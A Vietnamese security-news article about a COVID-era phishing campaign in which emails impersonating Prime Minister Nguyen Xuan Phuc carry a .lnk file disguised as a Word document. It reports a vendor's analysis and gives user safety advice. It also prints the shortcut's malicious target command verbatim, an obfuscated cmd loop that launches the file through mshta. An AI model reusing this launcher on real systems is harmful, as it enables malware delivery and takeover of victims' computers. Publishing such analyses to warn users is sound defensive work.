Kẻ gian đã lợi dụng tình hình phức tạp của dịch bệnh do virus COVID-19 gây ra để gửi đi những email giả mạo có chứa mã độc. Mã độc này được chèn trong 1 tệp văn bản có tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc”.
Phát hiện email giả mạo Thủ tướng chính phủ phát tán mã độc
Mới đây, hệ thống CMC Threat Intelligence đã phát hiện một đoạn mã độc được chứa trong văn bản được gửi đi với tiêu đề “Chi thi cua Thu tuong Nguyen Xuan Phuc”. Theo phân tích từ phía công ty CMC Cyber Security, file mẫu là file shortcut có đuôi mở rộng là “”.lnk”. File này được ẩn danh dưới dạng một Word thông thường để đánh lừa người dùng bởi vì hệ điều hành sẽ ẩn đi file có đuôi “.lnk”.

Tuy nhiên, email giả mạo này được các chuyên gia đánh giá là có chứa file Word trong đó có một target đáng ngờ. Thông thường với một target của shortcut nó sẽ trỏ đến một thư mục hoặc một file đích nào đó. Nhưng target có trong mẫu này lại chứa đoạn command dạng “”%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.

Các chuyên gia của CMC Cyber Security cho biết, nếu người dùng tải file này về máy tính thì kẻ gian có thể tấn công và thực hiện các lệnh từ xa. Bởi vì các mã độc có thể tạo ra các backdoor và câu lệnh để những kẻ tấn công có thể làm chủ được máy tính của người dùng. Thông tin máy tính, thông tin người,… sẽ bị lấy cắp. Hoặc các lệnh như: upload file, đọc file, thư mục, list folder,… cũng sẽ bị kẻ gian điều khiển từ xa.
Các chuyên gia bảo mật cảnh báo với người dùng về email giả mạo “Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm nhằm phát tán mã độc đã và đang diễn ra hàng giờ. Không chỉ lợi dụng dịch bệnh Covid-19 mà còn rất nhiều thông tin khác. Người dùng nếu không cẩn trọng khi click và mở các file chứa mã độc sẽ rất dễ mất thông tin cá nhân. Các hacker có thể lợi dụng tài khoản của bạn để lan truyền các tin tức giả mạo hoặc phát tán đi các mã độc.”
Trong trường hợp nếu bắt buộc cần phải tải file về nhưng nghi ngờ về người gửi hoặc nội dung thì các bạn nên chuyển nó đến một mail khác tạm thời hoặc tải về một máy tính không có các thông tin cá nhân của mình để mở file. Hoặc nếu bạn am hiểu về máy ảo hãy mở nó trên máy ảo để đảm bảo an toàn.
Nếu bạn nhận được một email với tiêu đề như trên thì đó là email giả mạo. Hãy xóa email đó đi và tuyệt đối không tò mò mở nó ra. Luôn nhớ chỉ tải các file từ nguồn uy tín hoặc người gửi thân quen. Đề cao cảnh giác để không bị đánh cắp thông tin cá nhân.
BÀI VIẾT LIÊN QUAN
Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *
Tạo bình luận mới